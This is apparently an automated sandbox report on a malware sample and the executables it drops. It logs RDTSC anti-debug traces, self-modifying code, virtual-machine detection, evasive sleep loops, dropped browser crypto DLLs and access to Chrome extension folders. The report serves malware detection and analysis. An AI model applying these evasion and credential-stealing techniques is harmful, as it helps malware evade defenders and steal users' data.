Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC096E second address: 4CC097E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD7D899Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC097E second address: 4CC09BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a jmp 00007F95FD07A067h 0x0000000f je 00007F966F2CFA5Ah 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F95FD07A065h 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC09BC second address: 4CC0A31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F95FD7D89A7h 0x00000009 xor eax, 0B0CD99Eh 0x0000000f jmp 00007F95FD7D89A9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F95FD7D89A0h 0x0000001b jmp 00007F95FD7D89A5h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 test byte ptr [76FA6968h], 00000002h 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov cx, dx 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0A31 second address: 4CC0A37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0A37 second address: 4CC0A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0A3B second address: 4CC0A65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F966F2CF9BFh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 call 00007F95FD07A05Dh 0x00000019 pop eax 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0A65 second address: 4CC0A96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D899Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F95FD7D899Eh 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F95FD7D899Ah 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0A96 second address: 4CC0AA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0AA5 second address: 4CC0ACF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F95FD7D899Fh 0x00000008 push ecx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F95FD7D89A0h 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0ACF second address: 4CC0B49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F95FD07A066h 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 mov esi, 3714076Dh 0x00000016 movzx esi, dx 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c mov edi, 7F09F5B4h 0x00000021 popad 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 movsx ebx, cx 0x00000027 pushfd 0x00000028 jmp 00007F95FD07A062h 0x0000002d jmp 00007F95FD07A065h 0x00000032 popfd 0x00000033 popad 0x00000034 push dword ptr [ebp+14h] 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F95FD07A05Dh 0x0000003e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0B49 second address: 4CC0B67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0B67 second address: 4CC0B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0B6B second address: 4CC0B6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0B6F second address: 4CC0B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0B75 second address: 4CC0B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0B7B second address: 4CC0B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0BCD second address: 4CC0BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0BD1 second address: 4CC0BE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0CAB second address: 4CD0D00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F95FD7D899Ch 0x00000011 xor ah, 00000058h 0x00000014 jmp 00007F95FD7D899Bh 0x00000019 popfd 0x0000001a mov ax, AD0Fh 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F95FD7D89A1h 0x00000028 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0D00 second address: 4CD0D3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F95FD07A067h 0x00000008 call 00007F95FD07A068h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0D3D second address: 4CD0D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0D41 second address: 4CD0D45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0D45 second address: 4CD0D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0A57 second address: 4CD0A9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A060h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov esi, 7489C10Dh 0x00000010 pushfd 0x00000011 jmp 00007F95FD07A05Ah 0x00000016 or al, 00000028h 0x00000019 jmp 00007F95FD07A05Bh 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F95FD07A05Bh 0x0000002a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0A9D second address: 4CD0ABA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0ABA second address: 4CD0AC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0AC0 second address: 4CD0AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Special instruction interceptor: First address: 3CE846 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Special instruction interceptor: First address: 57DDE1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Special instruction interceptor: First address: 5F7A73 instructions caused by: Self-modifying code
Source: C:\Users\userAKKKFBGDHJ.exe Special instruction interceptor: First address: AEA2E instructions caused by: Self-modifying code
Source: C:\Users\userAKKKFBGDHJ.exe Special instruction interceptor: First address: 258365 instructions caused by: Self-modifying code
Source: C:\Users\userAKKKFBGDHJ.exe Special instruction interceptor: First address: AEA22 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 40E846 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 5BDDE1 instructions caused by: Self-modifying code
Source: C:\Users\userAKKKFBGDHJ.exe Special instruction interceptor: First address: 2D7884 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 637A73 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 85EA2E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: A08365 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 85EA22 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: A87884 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Code function: 5_2_04D40CDC rdtsc 5_2_04D40CDC
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 379
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 367
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Window / User API: threadDelayed 530
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Window / User API: threadDelayed 1054
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Window / User API: threadDelayed 1080
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Window / User API: threadDelayed 830
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Window / User API: threadDelayed 406
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7756 Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7756 Thread sleep time: -70035s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7792 Thread sleep time: -60030s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7692 Thread sleep count: 379 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7692 Thread sleep time: -11370000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7948 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7760 Thread sleep time: -50025s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7692 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7748 Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7748 Thread sleep time: -74037s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7752 Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7752 Thread sleep time: -70035s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7700 Thread sleep count: 367 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7700 Thread sleep time: -11010000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7736 Thread sleep time: -52026s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7928 Thread sleep time: -540000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7700 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe TID: 5892 Thread sleep count: 283 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe TID: 5892 Thread sleep count: 175 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe TID: 5892 Thread sleep count: 1080 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe TID: 5892 Thread sleep count: 322 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe TID: 5892 Thread sleep count: 830 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe TID: 5892 Thread sleep count: 406 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Thread sleep count: Count: 1054 delay: -10
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Thread sleep count: Count: 1080 delay: -10
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_004139B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040E270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00401710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004143F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 0_2_00414050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_004133C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401160 GetSystemInfo,ExitProcess, 0_2_00401160
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: explorti.exe, 00000013.00000002.3258303084.0000000001608000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWn
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: firefox.exe, 0000001E.00000002.3031858393.00000270CC65D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2957174991.00000270CC674000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2958156579.00000270CC674000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2958769374.00000270CC674000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2958487375.00000270CC674000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
